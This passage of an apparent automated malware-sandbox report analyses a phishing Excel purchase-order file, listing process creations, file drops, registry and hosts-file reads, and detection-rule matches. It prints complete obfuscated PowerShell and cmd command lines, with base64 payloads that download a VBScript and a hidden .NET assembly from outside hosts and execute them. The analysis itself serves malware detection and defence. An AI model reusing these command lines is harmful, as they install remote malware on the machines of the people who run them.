ICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeingJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE89A9352E8_2_000007FE89A9352E
        Source: NB PO-104105107108.xlsOLE indicator, VBA macros: true
        Source: ~DFC80289B61A888CC7.TMP.0.drOLE indicator, VBA macros: true
        Source: NB PO-104105107108.xlsStream path 'MBD0004282D/\x1Ole' : https://curt.wiz.co/VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&verandaIbH}VITRa6$Z;;b*I;VjV+.GOW^OvKGmQ'H!<pbG1;F"1+f{@7heEkpe20wwTEoTfb2aP95eF9kzwrVjX4WHSRLFf3lFyTsntX3k7PK2p6lrGb8VQEY6hwXDWuFIBMcnyYPv0W7mhvdtPXFUoSMlQ1MQu8IPWwRXcCfG69Yj6Mpfu9E7gnUD49FRxPvCnzUzD1UXTWQPzBo0dWq40SZmTRNtYc4py2A8ynQjYa2O7E3EjHGb8qECgg7DJknoHvWnqWCQC1B53fA3O !:;Z'syHK~l
        Source: ~DFC80289B61A888CC7.TMP.0.drStream path 'MBD0004282D/\x1Ole' : https://curt.wiz.co/VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&verandaIbH}VITRa6$Z;;b*I;VjV+.GOW^OvKGmQ'H!<pbG1;F"1+f{@7heEkpe20wwTEoTfb2aP95eF9kzwrVjX4WHSRLFf3lFyTsntX3k7PK2p6lrGb8VQEY6hwXDWuFIBMcnyYPv0W7mhvdtPXFUoSMlQ1MQu8IPWwRXcCfG69Yj6Mpfu9E7gnUD49FRxPvCnzUzD1UXTWQPzBo0dWq40SZmTRNtYc4py2A8ynQjYa2O7E3EjHGb8qECgg7DJknoHvWnqWCQC1B53fA3O !:;Z'syHK~l
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2003
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2003
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2003Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2003Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 2648, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.phis.troj.expl.evad.winXLS@29/38@22/4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbSJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC042.tmpJump to behavior
        Source: NB PO-104105107108.xlsOLE indicator, Workbook stream: true
        Source: ~DFC80289B61A888CC7.TMP.0.drOLE indicator, Workbook stream: true
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..+..............P................m.......m.....}..w.............................1......(.P..............3........+.............`P..............Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....`P......\.......................(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..+.....................................`P......}..w............ 9b........l.... .a.....(.P.......................+.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....`P......\.......................(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..+.....................................`P......}..w............ 9b........l.... .a.....(.P.......................+.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....x.......N.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1. 9b........l.... .a.....(.P.....................x....... .......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..+.....................................`P......}..w............ 9b........l.... .a.....(.P.......................+.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....................x.......8.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..+.....................................`P......}..w............ 9b........l.... .a.....(.P.......................+.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........x.......F.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..+.....................................`P......}..w............ 9b........l.... .a.....(.P.......................+.....l.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......`P......}..w............ 9b........l.... .a.....(.P.....................x...............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................`P..............0.h.E....Wl.....}..w............@E......^...............(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................`P..................E....Wl.....}..w............@E......^...............(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m......#.......................#.......#........,..............3.......................#..............Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................#......}..w............8.......8.......@"......(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Qk....}..w.....#......\.......................(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'.".Qk.....xW.....(.P.....................H.......*.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Qk....}..w.....#......\.......................(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.2.3.....t.Qk.....xW.....(.P.....................H.......$.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................#......}..w............xuD.....t.Qk.....xW.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................#......}..w............xuD.....t.Qk.....xW.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................#......}..w............xuD.....t.Qk.....xW.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................#......}..w............xuD.....t.Qk.....xW.....(.P.............................T.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........#......}..w............xuD.....t.Qk.....xW.....(.P.....................H...............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w............\.......................(.P.....................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............h.c.....6..l............(.P.....................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............h.c.....6..l............(.P.....................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.h.c.....6..l............(.P............................. .......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............h.c.....6..l............(.P.....................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............h.c.....6..l............(.P.....................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w............\.......................(.P.....................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............h.c.....6..l............(.P.............................l.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w............h.c.....6..l............(.P.....................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................0..._k...Wl.....}..w............@E......^...............(.P.....................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ...................................._k...Wl.....}..w............@E......^...............(.P.....................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m......H.......................H.......H........,..............3.......................H..............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....X...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................H......}..w............8.......8.......@"......(.P.....X...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Yk....}..w.....H......\.......................(.P.....X...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'.".Yk......:.....(.P.....X...............h.......*.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Yk....}..w.....H......\.......................(.P.....X...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.2.3.....B|Yk......:.....(.P.....X...............h.......$.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................H......}..w..............'.....B|Yk......:.....(.P.....X...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................H......}..w..............'.....B|Yk......:.....(.P.....X...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................H......}..w..............'.....B|Yk......:.....(.P.....X...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................H......}..w..............'.....B|Yk......:.....(.P.....X.......................T.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........H......}..w..............'.....B|Yk......:.....(.P.....X...............h...............................
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: NB PO-104105107108.xlsReversingLabs: Detection: 23%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpe